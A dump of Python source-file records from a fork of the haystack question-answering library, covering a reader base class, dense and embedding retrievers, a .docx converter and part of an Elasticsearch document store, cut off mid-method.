"language": "Python",
"length_bytes": 2116,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 46,
"path": "/haystack/reader/base.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom scipy.special import expit\nfrom abc import ABC, abstractmethod\nfrom typing import List, Optional, Sequence\n\nfrom haystack.database.base import Document\n\n\nclass BaseReader(ABC):\n return_no_answers: bool\n\n @abstractmethod\n def predict(self, question: str, documents: List[Document], top_k: Optional[int] = None):\n pass\n\n @abstractmethod\n def predict_batch(self, question_doc_list: List[dict], top_k_per_question: Optional[int] = None,\n batch_size: Optional[int] = None):\n pass\n\n @staticmethod\n def _calc_no_answer(no_ans_gaps: Sequence[float], best_score_answer: float):\n # \"no answer\" scores and positive answers scores are difficult to compare, because\n # + a positive answer score is related to one specific document\n # - a \"no answer\" score is related to all input documents\n # Thus we compute the \"no answer\" score relative to the best possible answer and adjust it by\n # the most significant difference between scores.\n # Most significant difference: a model switching from predicting an answer to \"no answer\" (or vice versa).\n # No_ans_gap is a list of this most significant difference per document\n no_ans_gaps = np.array(no_ans_gaps)\n max_no_ans_gap = np.max(no_ans_gaps)\n # all passages \"no answer\" as top score\n if (np.sum(no_ans_gaps < 0) == len(no_ans_gaps)): # type: ignore\n no_ans_score = best_score_answer - max_no_ans_gap # max_no_ans_gap is negative, so it increases best pos score\n else: # case: at least one passage predicts an answer (positive no_ans_gap)\n no_ans_score = best_score_answer - max_no_ans_gap\n\n no_ans_prediction = {\"answer\": None,\n \"score\": no_ans_score,\n \"probability\": float(expit(np.asarray(no_ans_score) / 8)), # just a pseudo prob for now\n \"context\": None,\n \"offset_start\": 0,\n \"offset_end\": 0,\n \"document_id\": None,\n \"meta\": None,}\n return no_ans_prediction, max_no_ans_gap\n"
},
{
"alpha_fraction": 0.5832365155220032,
"alphanum_fraction": 0.5870617628097534,
"avg_line_length": 50.7593994140625,
"blob_id": "e94cea3d1a5087dff16d546f636a654ff063408d",
"content_id": "889a87fe860882d30a37b74a6d5ad48e6ccf10c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20654,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 399,
"path": "/haystack/retriever/dense.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nfrom typing import Type, List, Union, Tuple, Optional\nimport torch\nimport numpy as np\nfrom pathlib import Path\n\nfrom farm.infer import Inferencer\n\nfrom haystack.database.base import Document, BaseDocumentStore\nfrom haystack.database.elasticsearch import ElasticsearchDocumentStore\nfrom haystack.retriever.base import BaseRetriever\nfrom haystack.retriever.sparse import logger\n\nfrom haystack.retriever.dpr_utils import DPRContextEncoder, DPRQuestionEncoder, DPRConfig, DPRContextEncoderTokenizer, \\\n DPRQuestionEncoderTokenizer\n\nimport time\n\nlogger = logging.getLogger(__name__)\n\n\nclass DensePassageRetriever(BaseRetriever):\n \"\"\"\n Retriever that uses a bi-encoder (one transformer for query, one transformer for passage).\n See the original paper for more details:\n Karpukhin, Vladimir, et al. (2020): \"Dense Passage Retrieval for Open-Domain Question Answering.\"\n (https://arxiv.org/abs/2004.04906).\n \"\"\"\n\n def __init__(self,\n document_store: BaseDocumentStore,\n query_embedding_model: str,\n passage_embedding_model: str,\n max_seq_len: int = 256,\n use_gpu: bool = True,\n batch_size: int = 16,\n embed_title: bool = True,\n remove_sep_tok_from_untitled_passages: bool = True,\n model_type: str = \"dpr\",\n pad_to_max_length: bool = True,\n ):\n \"\"\"\n Init the Retriever incl. the two encoder models from a local or remote model checkpoint.\n The checkpoint format matches huggingface transformers' model format\n\n :Example:\n\n # remote model from FAIR\n >>> DensePassageRetriever(document_store=your_doc_store,\n query_embedding_model=\"facebook/dpr-question_encoder-single-nq-base\",\n passage_embedding_model=\"facebook/dpr-ctx_encoder-single-nq-base\",\n use_gpu=True)\n # or from local path\n >>> DensePassageRetriever(document_store=your_doc_store,\n query_embedding_model=\"local-path/query-checkpoint\",\n passage_embedding_model=\"local-path/ctx-checkpoint\",\n use_gpu=True)\n :param document_store: An instance of DocumentStore from which to retrieve documents.\n :param query_embedding_model: Local path or remote name of question encoder checkpoint. The format equals the\n one used by hugging-face transformers' modelhub models\n Currently available remote names: \"facebook/dpr-question_encoder-single-nq-base\"\n :param passage_embedding_model: Local path or remote name of passage encoder checkpoint. The format equals the\n one used by hugging-face transformers' modelhub models\n Currently available remote names: \"facebook/dpr-ctx_encoder-single-nq-base\"\n :param max_seq_len: Longest length of each sequence\n :param use_gpu: Whether to use gpu or not\n :param batch_size: Number of questions or passages to encode at once\n :param embed_title: Whether to concatenate title and passage to a text pair that is then used to create the embedding \n :param remove_sep_tok_from_untitled_passages: If embed_title is true, there are different strategies to deal with documents that don't have a title.\n True => Embed passage as single text, similar to embed_title = False (i.e [CLS] passage_tok1 ... [SEP])\n False => Embed passage as text pair with empty title (i.e. [CLS] [SEP] passage_tok1 ... [SEP])\n :param pad_to_max_length: Whether to add padding or not \n \"\"\"\n\n self.document_store = document_store\n self.batch_size = batch_size\n self.max_seq_len = max_seq_len\n\n if use_gpu and torch.cuda.is_available():\n self.device = torch.device(\"cuda\")\n else:\n self.device = torch.device(\"cpu\")\n\n self.embed_title = embed_title\n self.remove_sep_tok_from_untitled_passages = remove_sep_tok_from_untitled_passages\n\n self.model_type = model_type.upper()\n # Init & Load Encoders\n\n #1. Load Tokenizer\n #NB: I will use always the same Tokenizer (even though I will switch between checkpoints)\n self.query_tokenizer = DPRQuestionEncoderTokenizer.from_pretrained(\"facebook/dpr-question_encoder-single-nq-base\")\n self.passage_tokenizer = DPRContextEncoderTokenizer.from_pretrained(\"facebook/dpr-ctx_encoder-single-nq-base\")\n\n #2. Load Model\n valid_model_types = [\"DPR\",\"ORQA\",\"REALM\"]\n\n if self.model_type in valid_model_types:\n self.query_encoder = DPRQuestionEncoder.from_pretrained(query_embedding_model).to(self.device)\n self.passage_encoder = DPRContextEncoder.from_pretrained(passage_embedding_model).to(self.device)\n else:\n raise NotImplementedError \n \n self.pad_to_max_length=pad_to_max_length\n \n self.debug_mode=False #Set it from outside (TMP)\n \n logger.info(f\"BiEncoder implementation with {self.model_type}\")\n\n def retrieve(self, query: str, filters: dict = None, top_k: int = 10, index: str = None) -> List[Document]:\n if index is None:\n index = self.document_store.index\n\n tic = time.time()\n query_emb = self.embed_queries(texts=[query])\n toc = time.time()\n \n if self.debug_mode:\n print(f\"Question embedding time={toc-tic}\")\n\n tic = time.time()\n documents = self.document_store.query_by_embedding(query_emb=query_emb[0], top_k=top_k, filters=filters, index=index)\n toc= time.time()\n if self.debug_mode:\n print(f\"ES query time={toc-tic}\")\n\n \n return documents\n\n def embed_queries(self, texts: List[str]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of queries using the query encoder\n\n :param texts: queries to embed\n :return: embeddings, one per input queries\n \"\"\"\n queries = [self._normalize_query(q) for q in texts]\n result = self._generate_batch_predictions(texts=queries, model=self.query_encoder,\n tokenizer=self.query_tokenizer,\n batch_size=self.batch_size)\n return result\n\n def embed_passages(self, docs: List[Document]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of passages using the passage encoder\n\n :param docs: List of Document objects used to represent documents / passages in a standardized way within Haystack.\n :return: embeddings of documents / passages shape (batch_size, embedding_dim)\n \"\"\"\n texts = [d.text for d in docs]\n titles = None\n if self.embed_title:\n titles = [d.meta[\"name\"] if d.meta and \"name\" in d.meta else \"\" for d in docs]\n\n result = self._generate_batch_predictions(texts=texts, titles=titles,\n model=self.passage_encoder,\n tokenizer=self.passage_tokenizer,\n batch_size=self.batch_size)\n return result\n\n def _normalize_query(self, query: str) -> str:\n if query[-1] == '?':\n query = query[:-1]\n return query\n\n def _tensorizer(self, tokenizer: Union[DPRQuestionEncoderTokenizer, DPRContextEncoderTokenizer],\n text: List[str],\n title: Optional[List[str]] = None,\n add_special_tokens: bool = True):\n \"\"\"\n Creates tensors from text sequences\n :Example:\n >>> ctx_tokenizer = DPRContextEncoderTokenizer.from_pretrained()\n >>> dpr_object._tensorizer(tokenizer=ctx_tokenizer, text=passages, title=titles)\n\n :param tokenizer: An instance of DPRQuestionEncoderTokenizer or DPRContextEncoderTokenizer.\n :param text: list of text sequences to be tokenized\n :param title: optional list of titles associated with each text sequence\n :param add_special_tokens: boolean for whether to encode special tokens in each sequence\n\n Returns:\n token_ids: list of token ids from vocabulary\n token_type_ids: list of token type ids\n attention_mask: list of indices specifying which tokens should be attended to by the encoder\n \"\"\"\n\n # combine titles with passages only if some titles are present with passages\n if self.embed_title and title:\n final_text = [tuple((title_, text_)) for title_, text_ in zip(title, text)] #type: Union[List[Tuple[str, ...]], List[str]]\n else:\n final_text = text\n out = tokenizer.batch_encode_plus(final_text, add_special_tokens=add_special_tokens, truncation=True,\n max_length=self.max_seq_len,\n pad_to_max_length=self.pad_to_max_length)\n\n token_ids = torch.tensor(out['input_ids']).to(self.device)\n token_type_ids = torch.tensor(out['token_type_ids']).to(self.device)\n attention_mask = torch.tensor(out['attention_mask']).to(self.device)\n return token_ids, token_type_ids, attention_mask\n\n def _remove_sep_tok_from_untitled_passages(self, titles, ctx_ids_batch, ctx_attn_mask):\n \"\"\"\n removes [SEP] token from untitled samples in batch. For batches which has some untitled passages, remove [SEP]\n token used to segment titles and passage from untitled samples in the batch\n (Official DPR code do not encode [SEP] tokens in untitled passages)\n\n :Example:\n # Encoding passages with 'embed_title' = True. 1st passage is titled, 2nd passage is untitled\n >>> texts = ['Aaron Aaron ( or ; \"\"Ahärôn\"\") is a prophet, high priest, and the brother of Moses in the Abrahamic religions.',\n 'Democratic Republic of the Congo to the south. Angola\\'s capital, Luanda, lies on the Atlantic coast in the northwest of the country.'\n ]\n >> titles = [\"0\", '']\n >>> token_ids, token_type_ids, attention_mask = self._tensorizer(self.passage_tokenizer, text=texts, title=titles)\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[0]]\n ['[CLS]', '0', '[SEP]', 'aaron', 'aaron', '(', 'or', ';', ....]\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[1]]\n ['[CLS]', '[SEP]', 'democratic', 'republic', 'of', 'the', ....]\n >>> new_ids, new_attn = self._remove_sep_tok_from_untitled_passages(titles, token_ids, attention_mask)\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[0]]\n ['[CLS]', '0', '[SEP]', 'aaron', 'aaron', '(', 'or', ';', ....]\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[1]]\n ['[CLS]', 'democratic', 'republic', 'of', 'the', 'congo', ...]\n\n :param titles: list of titles for each sample\n :param ctx_ids_batch: tensor of shape (batch_size, max_seq_len) containing token indices\n :param ctx_attn_mask: tensor of shape (batch_size, max_seq_len) containing attention mask\n\n Returns:\n ctx_ids_batch: tensor of shape (batch_size, max_seq_len) containing token indices with [SEP] token removed\n ctx_attn_mask: tensor of shape (batch_size, max_seq_len) reflecting the ctx_ids_batch changes\n \"\"\"\n # Skip [SEP] removal if passage encoder not bert model\n if self.passage_encoder.ctx_encoder.base_model_prefix != 'bert_model':\n logger.warning(\"Context encoder is not a BERT model. Skipping removal of [SEP] tokens\")\n return ctx_ids_batch, ctx_attn_mask\n\n # create a mask for titles in the batch\n titles_mask = torch.tensor(list(map(lambda x: 0 if x == \"\" else 1, titles))).to(self.device)\n\n # get all untitled passage indices\n no_title_indices = torch.nonzero(1 - titles_mask).squeeze(-1)\n\n # remove [SEP] token index for untitled passages and add 1 pad to compensate\n ctx_ids_batch[no_title_indices] = torch.cat((ctx_ids_batch[no_title_indices, 0].unsqueeze(-1),\n ctx_ids_batch[no_title_indices, 2:],\n torch.tensor([self.passage_tokenizer.pad_token_id]).expand(len(no_title_indices)).unsqueeze(-1).to(self.device)),\n dim=1)\n # Modify attention mask to reflect [SEP] token removal and pad addition in ctx_ids_batch\n ctx_attn_mask[no_title_indices] = torch.cat((ctx_attn_mask[no_title_indices, 0].unsqueeze(-1),\n ctx_attn_mask[no_title_indices, 2:],\n torch.tensor([self.passage_tokenizer.pad_token_id]).expand(len(no_title_indices)).unsqueeze(-1).to(self.device)),\n dim=1)\n\n return ctx_ids_batch, ctx_attn_mask\n\n def _generate_batch_predictions(self,\n texts: List[str],\n model: torch.nn.Module,\n tokenizer: Union[DPRQuestionEncoderTokenizer, DPRContextEncoderTokenizer],\n titles: Optional[List[str]] = None, #useful only for passage embedding with DPR!\n batch_size: int = 16) -> List[Tuple[object, np.array]]:\n n = len(texts)\n total = 0\n results = []\n for batch_start in range(0, n, batch_size):\n # create batch of titles only for passages\n ctx_title = None\n if self.embed_title and titles:\n ctx_title = titles[batch_start:batch_start + batch_size]\n\n # create batch of text\n ctx_text = texts[batch_start:batch_start + batch_size]\n\n # tensorize the batch\n ctx_ids_batch, _, ctx_attn_mask = self._tensorizer(tokenizer, text=ctx_text, title=ctx_title)\n ctx_seg_batch = torch.zeros_like(ctx_ids_batch).to(self.device)\n\n # remove [SEP] token from untitled passages in batch\n if self.embed_title and self.remove_sep_tok_from_untitled_passages and ctx_title:\n ctx_ids_batch, ctx_attn_mask = self._remove_sep_tok_from_untitled_passages(ctx_title,\n ctx_ids_batch,\n ctx_attn_mask)\n\n with torch.no_grad():\n out = model(input_ids=ctx_ids_batch, attention_mask=ctx_attn_mask, token_type_ids=ctx_seg_batch)\n # TODO revert back to when updating transformers\n # out = out.pooler_output\n out = out[0]\n out = out.cpu()\n\n total += ctx_ids_batch.size()[0]\n\n results.extend([\n (out[i].view(-1).numpy())\n for i in range(out.size(0))\n ])\n\n if total % 10 == 0:\n logger.info(f'Embedded {total} / {n} texts')\n\n return results\n\nclass EmbeddingRetriever(BaseRetriever):\n def __init__(\n self,\n document_store: BaseDocumentStore,\n embedding_model: str,\n use_gpu: bool = True,\n model_format: str = \"farm\",\n pooling_strategy: str = \"reduce_mean\",\n emb_extraction_layer: int = -1,\n ):\n \"\"\"\n :param document_store: An instance of DocumentStore from which to retrieve documents.\n :param embedding_model: Local path or name of model in Hugging Face's model hub. Example: 'deepset/sentence_bert'\n :param use_gpu: Whether to use gpu or not\n :param model_format: Name of framework that was used for saving the model. Options: 'farm', 'transformers', 'sentence_transformers'\n :param pooling_strategy: Strategy for combining the embeddings from the model (for farm / transformers models only).\n Options: 'cls_token' (sentence vector), 'reduce_mean' (sentence vector),\n reduce_max (sentence vector), 'per_token' (individual token vectors)\n :param emb_extraction_layer: Number of layer from which the embeddings shall be extracted (for farm / transformers models only).\n Default: -1 (very last layer).\n \"\"\"\n self.document_store = document_store\n self.model_format = model_format\n self.embedding_model = embedding_model\n self.pooling_strategy = pooling_strategy\n self.emb_extraction_layer = emb_extraction_layer\n\n logger.info(f\"Init retriever using embeddings of model {embedding_model}\")\n if model_format == \"farm\" or model_format == \"transformers\":\n self.embedding_model = Inferencer.load(\n embedding_model, task_type=\"embeddings\", extraction_strategy=self.pooling_strategy,\n extraction_layer=self.emb_extraction_layer, gpu=use_gpu, batch_size=4, max_seq_len=512, num_processes=0\n )\n\n elif model_format == \"sentence_transformers\":\n from sentence_transformers import SentenceTransformer\n\n # pretrained embedding models coming from: https://github.com/UKPLab/sentence-transformers#pretrained-models\n # e.g. 'roberta-base-nli-stsb-mean-tokens'\n if use_gpu:\n device = \"cuda\"\n else:\n device = \"cpu\"\n self.embedding_model = SentenceTransformer(embedding_model, device=device)\n else:\n raise NotImplementedError\n\n def retrieve(self, query: str, filters: dict = None, top_k: int = 10, index: str = None) -> List[Document]:\n if index is None:\n index = self.document_store.index\n query_emb = self.embed(texts=[query])\n documents = self.document_store.query_by_embedding(query_emb=query_emb[0], filters=filters,\n top_k=top_k, index=index)\n return documents\n\n def embed(self, texts: Union[List[str], str]) -> List[np.array]:\n \"\"\"\n Create embeddings for each text in a list of texts using the retrievers model (`self.embedding_model`)\n :param texts: texts to embed\n :return: list of embeddings (one per input text). Each embedding is a list of floats.\n \"\"\"\n\n # for backward compatibility: cast pure str input\n if type(texts) == str:\n texts = [texts] # type: ignore\n assert type(texts) == list, \"Expecting a list of texts, i.e. create_embeddings(texts=['text1',...])\"\n\n if self.model_format == \"farm\" or self.model_format == \"transformers\":\n emb = self.embedding_model.inference_from_dicts(dicts=[{\"text\": t} for t in texts]) # type: ignore\n emb = [(r[\"vec\"]) for r in emb]\n elif self.model_format == \"sentence_transformers\":\n # text is single string, sentence-transformers needs a list of strings\n # get back list of numpy embedding vectors\n emb = self.embedding_model.encode(texts) # type: ignore\n # cast to float64 as float32 can cause trouble when serializing for ES\n emb = [(r.astype('float64')) for r in emb]\n return emb\n\n def embed_queries(self, texts: List[str]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of queries. For this Retriever type: The same as calling .embed()\n\n :param texts: queries to embed\n :return: embeddings, one per input queries\n \"\"\"\n return self.embed(texts)\n\n def embed_passages(self, docs: List[Document]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of passages. For this Retriever type: The same as calling .embed()\n\n :param texts: passage to embed\n :return: embeddings, one per input passage\n \"\"\"\n texts = [d.text for d in docs]\n\n return self.embed(texts)\n"
},
{
"alpha_fraction": 0.6765676736831665,
"alphanum_fraction": 0.6765676736831665,
"avg_line_length": 40.7931022644043,
"blob_id": "0a44e13fae34e852642c2010ed325a594c424e7e",
"content_id": "b9946141314becd81daf5058a5510530f20d316e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1212,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 29,
"path": "/haystack/indexing/file_converters/docx.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack.indexing.file_converters.base import BaseConverter\nimport logging\nfrom pathlib import Path\nfrom typing import List, Dict, Optional, Any, Tuple\nimport docx\n\nlogger = logging.getLogger(__name__)\n\n\nclass DocxToTextConverter(BaseConverter):\n def extract_pages(self, file_path: Path) -> Tuple[List[str], Optional[Dict[str, Any]]]:\n \"\"\"\n Extract text from a .docx file.\n Note: As docx doesn't contain \"page\" information, we actually extract and return a list of paragraphs here.\n For compliance with other converters we nevertheless opted for keeping the methods name.\n\n :param file_path: Path to the .docx file you want to convert\n \"\"\"\n\n #TODO We might want to join small passages here (e.g. titles)\n #TODO Investigate if there's a workaround to extract on a page level rather than passage level\n # (e.g. in the test sample it seemed that page breaks resulted in a paragraphs with only a \"\\n\"\n\n doc = docx.Document(file_path) # Creating word reader object.\n fullText = []\n for para in doc.paragraphs:\n if para.text.strip() != \"\":\n fullText.append(para.text)\n return fullText, None\n"
},
{
"alpha_fraction": 0.5611247420310974,
"alphanum_fraction": 0.5629162192344666,
"avg_line_length": 45.67454528808594,
"blob_id": "dd9fbd5d825eb2cdaa56c02c6bd1c9d8c976f5b8",
"content_id": "4526ca4d862d46db00f73510537dc5eb53d161f5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25677,
"license_type": "permissive",
"max_line_length": 233,
"num_lines": 550,
"path": "/haystack/database/elasticsearch.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport time\nimport datetime\nfrom string import Template\nfrom typing import List, Optional, Union, Dict, Any\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk, scan\nimport numpy as np\n\nfrom haystack.database.base import BaseDocumentStore, Document, Label\nfrom haystack.indexing.utils import eval_data_from_file\nfrom haystack.retriever.base import BaseRetriever\n\nlogger = logging.getLogger(__name__)\n\n\nclass ElasticsearchDocumentStore(BaseDocumentStore):\n def __init__(\n self,\n host: str = \"localhost\",\n port: int = 9200,\n username: str = \"\",\n password: str = \"\",\n index: str = \"document\",\n label_index: str = \"label\",\n search_fields: Union[str, list] = \"text\",\n text_field: str = \"text\",\n name_field: str = \"name\",\n embedding_field: str = \"embedding\",\n embedding_dim: int = 768,\n custom_mapping: Optional[dict] = None,\n excluded_meta_data: Optional[list] = None,\n faq_question_field: Optional[str] = None,\n scheme: str = \"http\",\n ca_certs: bool = False,\n verify_certs: bool = True,\n create_index: bool = True,\n update_existing_documents: bool = False,\n refresh_type: str = \"wait_for\",\n request_timeout: int = 10,\n similarity_function: str = \"cosineSimilarity\",\n maxsize: int = 10,\n ):\n \"\"\"\n A DocumentStore using Elasticsearch to store and query the documents for our search.\n\n * Keeps all the logic to store and query documents from Elastic, incl. mapping of fields, adding filters or boosts to your queries, and storing embeddings\n * You can either use an existing Elasticsearch index or create a new one via haystack\n * Retrievers operate on top of this DocumentStore to find the relevant documents for a query\n\n :param host: url of elasticsearch\n :param port: port of elasticsearch\n :param username: username\n :param password: password\n :param index: Name of index in elasticsearch to use. If not existing yet, we will create one.\n :param search_fields: Name of fields used by ElasticsearchRetriever to find matches in the docs to our incoming query (using elastic's multi_match query), e.g. [\"title\", \"full_text\"]\n :param text_field: Name of field that might contain the answer and will therefore be passed to the Reader Model (e.g. \"full_text\").\n If no Reader is used (e.g. in FAQ-Style QA) the plain content of this field will just be returned.\n :param name_field: Name of field that contains the title of the the doc\n :param embedding_field: Name of field containing an embedding vector (Only needed when using a dense retriever (e.g. DensePassageRetriever, EmbeddingRetriever) on top)\n :param embedding_dim: Dimensionality of embedding vector (Only needed when using a dense retriever (e.g. DensePassageRetriever, EmbeddingRetriever) on top)\n :param custom_mapping: If you want to use your own custom mapping for creating a new index in Elasticsearch, you can supply it here as a dictionary.\n :param excluded_meta_data: Name of fields in Elasticsearch that should not be returned (e.g. [field_one, field_two]).\n Helpful if you have fields with long, irrelevant content that you don't want to display in results (e.g. embedding vectors).\n :param scheme: 'https' or 'http', protocol used to connect to your elasticsearch instance\n :param ca_certs: Root certificates for SSL\n :param verify_certs: Whether to be strict about ca certificates\n :param create_index: Whether to try creating a new index (If the index of that name is already existing, we will just continue in any case)\n :param update_existing_documents: Whether to update any existing documents with the same ID when adding\n documents. When set as True, any document with an existing ID gets updated.\n If set to False, an error is raised if the document ID of the document being\n added already exists.\n :param refresh_type: Type of ES refresh used to control when changes made by a request (e.g. bulk) are made visible to search.\n Values:\n - 'wait_for' => continue only after changes are visible (slow, but safe)\n - 'false' => continue directly (fast, but sometimes unintuitive behaviour when docs are not immediately available after indexing)\n More info at https://www.elastic.co/guide/en/elasticsearch/reference/6.8/docs-refresh.html\n :param request_timeout: Elasticsearch client timeout\n :param similarity_function: Similarity function used to compute score between two vectors.\n Values:\n - 'cosineSimilarity'\n - 'dotProduct'\n :param maxsize: number of connections to each node\n More info at https://elasticsearch-py.readthedocs.io/en/master/#thread-safety\n \n \"\"\"\n self.client = Elasticsearch(hosts=[{\"host\": host, \"port\": port}], http_auth=(username, password),\n scheme=scheme, ca_certs=ca_certs, verify_certs=verify_certs, maxsize=maxsize)\n\n # configure mappings to ES fields that will be used for querying / displaying results\n if type(search_fields) == str:\n search_fields = [search_fields]\n\n #TODO we should implement a more flexible interal mapping here that simplifies the usage of additional,\n # custom fields (e.g. meta data you want to return)\n self.search_fields = search_fields\n self.text_field = text_field\n self.name_field = name_field\n self.embedding_field = embedding_field\n self.embedding_dim = embedding_dim\n self.excluded_meta_data = excluded_meta_data\n self.faq_question_field = faq_question_field\n\n self.custom_mapping = custom_mapping\n if create_index:\n self._create_document_index(index)\n self.index: str = index\n\n self._create_label_index(label_index)\n self.label_index: str = label_index\n self.update_existing_documents = update_existing_documents\n self.refresh_type = refresh_type\n self.request_timeout = request_timeout\n self.similarity_function = similarity_function\n self.offset_for_positive_dot_product=0 #Set from outside if needed (almost useless). Other info at https://www.elastic.co/guide/en/elasticsearch/reference/master/query-dsl-script-score-query.html#script-score-top-level-params\n \n def _create_document_index(self, index_name):\n if self.client.indices.exists(index=index_name):\n return\n\n if self.custom_mapping:\n mapping = self.custom_mapping\n else:\n mapping = {\n \"mappings\": {\n \"properties\": {\n self.name_field: {\"type\": \"keyword\"},\n self.text_field: {\"type\": \"text\"},\n },\n \"dynamic_templates\": [\n {\n \"strings\": {\n \"path_match\": \"*\",\n \"match_mapping_type\": \"string\",\n \"mapping\": {\"type\": \"keyword\"}}}\n ],\n }\n }\n if self.embedding_field:\n mapping[\"mappings\"][\"properties\"][self.embedding_field] = {\"type\": \"dense_vector\", \"dims\": self.embedding_dim}\n self.client.indices.create(index=index_name, body=mapping)\n\n def _create_label_index(self, index_name):\n if self.client.indices.exists(index=index_name):\n return\n mapping = {\n \"mappings\": {\n \"properties\": {\n \"question\": {\"type\": \"text\"},\n \"answer\": {\"type\": \"text\"},\n \"is_correct_answer\": {\"type\": \"boolean\"},\n \"is_correct_document\": {\"type\": \"boolean\"},\n \"origin\": {\"type\": \"keyword\"},\n \"document_id\": {\"type\": \"keyword\"},\n \"offset_start_in_doc\": {\"type\": \"long\"},\n \"no_answer\": {\"type\": \"boolean\"},\n \"model_id\": {\"type\": \"keyword\"},\n \"type\": {\"type\": \"keyword\"},\n }\n }\n }\n self.client.indices.create(index=index_name, body=mapping)\n\n # TODO: Add flexibility to define other non-meta and meta fields expected by the Document class\n def _create_document_field_map(self) -> Dict:\n return {\n self.text_field: \"text\",\n self.embedding_field: \"embedding\",\n self.faq_question_field if self.faq_question_field else \"question\": \"question\"\n }\n\n def get_document_by_id(self, id: str, index=None) -> Optional[Document]:\n index = index or self.index\n documents = self.get_documents_by_id([id], index=index)\n if documents:\n return documents[0]\n else:\n return None\n\n def get_documents_by_id(self, ids: List[str], index=None) -> List[Document]:\n index = index or self.index\n query = {\"query\": {\"ids\": {\"values\": ids}}}\n result = self.client.search(index=index, body=query)[\"hits\"][\"hits\"]\n documents = [self._convert_es_hit_to_document(hit) for hit in result]\n return documents\n\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n \"\"\"\n Indexes documents for later queries in Elasticsearch.\n\n When using explicit document IDs, any existing document with the same ID gets updated.\n\n :param documents: a list of Python dictionaries or a list of Haystack Document objects.\n For documents as dictionaries, the format is {\"text\": \"<the-actual-text>\"}.\n Optionally: Include meta data via {\"text\": \"<the-actual-text>\",\n \"meta\":{\"name\": \"<some-document-name>, \"author\": \"somebody\", ...}}\n It can be used for filtering and is accessible in the responses of the Finder.\n Advanced: If you are using your own Elasticsearch mapping, the key names in the dictionary\n should be changed to what you have set for self.text_field and self.name_field.\n :param index: Elasticsearch index where the documents should be indexed. If not supplied, self.index will be used.\n :return: None\n \"\"\"\n\n if index and not self.client.indices.exists(index=index):\n self._create_document_index(index)\n\n if index is None:\n index = self.index\n\n # Make sure we comply to Document class format\n documents_objects = [Document.from_dict(d, field_map=self._create_document_field_map())\n if isinstance(d, dict) else d for d in documents]\n\n documents_to_index = []\n for doc in documents_objects:\n\n _doc = {\n \"_op_type\": \"index\" if self.update_existing_documents else \"create\",\n \"_index\": index,\n **doc.to_dict(field_map=self._create_document_field_map())\n } # type: Dict[str, Any]\n\n # rename id for elastic\n _doc[\"_id\"] = str(_doc.pop(\"id\"))\n\n # don't index query score and empty fields\n _ = _doc.pop(\"query_score\", None)\n _doc = {k:v for k,v in _doc.items() if v is not None}\n\n # In order to have a flat structure in elastic + similar behaviour to the other DocumentStores,\n # we \"unnest\" all value within \"meta\"\n if \"meta\" in _doc.keys():\n for k, v in _doc[\"meta\"].items():\n _doc[k] = v\n _doc.pop(\"meta\")\n documents_to_index.append(_doc)\n bulk(self.client, documents_to_index, request_timeout=self.request_timeout, refresh=self.refresh_type)\n\n def write_labels(self, labels: Union[List[Label], List[dict]], index: Optional[str] = None):\n index = index or self.label_index\n if index and not self.client.indices.exists(index=index):\n self._create_label_index(index)\n\n # Make sure we comply to Label class format\n label_objects = [Label.from_dict(l) if isinstance(l, dict) else l for l in labels]\n\n labels_to_index = []\n for label in label_objects:\n _label = {\n \"_op_type\": \"index\" if self.update_existing_documents else \"create\",\n \"_index\": index,\n **label.to_dict()\n } # type: Dict[str, Any]\n\n labels_to_index.append(_label)\n bulk(self.client, labels_to_index, request_timeout=self.request_timeout, refresh=self.refresh_type)\n\n def update_document_meta(self, id: str, meta: Dict[str, str]):\n body = {\"doc\": meta}\n self.client.update(index=self.index, doc_type=\"_doc\", id=id, body=body, refresh=self.refresh_type)\n\n def get_document_count(self, index: Optional[str] = None) -> int:\n if index is None:\n index = self.index\n result = self.client.count(index=index)\n count = result[\"count\"]\n return count\n\n def get_label_count(self, index: Optional[str] = None) -> int:\n return self.get_document_count(index=index)\n\n def get_all_documents(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Document]:\n if index is None:\n index = self.index\n\n result = self.get_all_documents_in_index(index=index, filters=filters)\n documents = [self._convert_es_hit_to_document(hit) for hit in result]\n\n return documents\n\n def get_all_labels(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Label]:\n index = index or self.label_index\n result = self.get_all_documents_in_index(index=index, filters=filters)\n labels = [Label.from_dict(hit[\"_source\"]) for hit in result]\n return labels\n\n def get_all_documents_in_index(self, index: str, filters: Optional[dict] = None) -> List[dict]:\n body = {\n \"query\": {\n \"bool\": {\n }\n }\n } # type: Dict[str, Any]\n if filters:\n filter_clause = []\n for key, values in filters.items():\n filter_clause.append(\n {\n \"range\": {key: values}\n }\n )\n body[\"query\"][\"bool\"][\"filter\"] = filter_clause\n else:\n body[\"query\"][\"bool\"][\"must\"] = {\"match_all\": {}}\n result = scan(self.client, query=body, index=index)\n\n return result\n\n def query(\n self,\n query: Optional[str],\n filters: Optional[Dict[str, List[str]]] = None,\n top_k: int = 10,\n custom_query: Optional[str] = None,\n index: Optional[str] = None,\n ) -> List[Document]:\n\n if index is None:\n index = self.index\n\n # Naive retrieval without 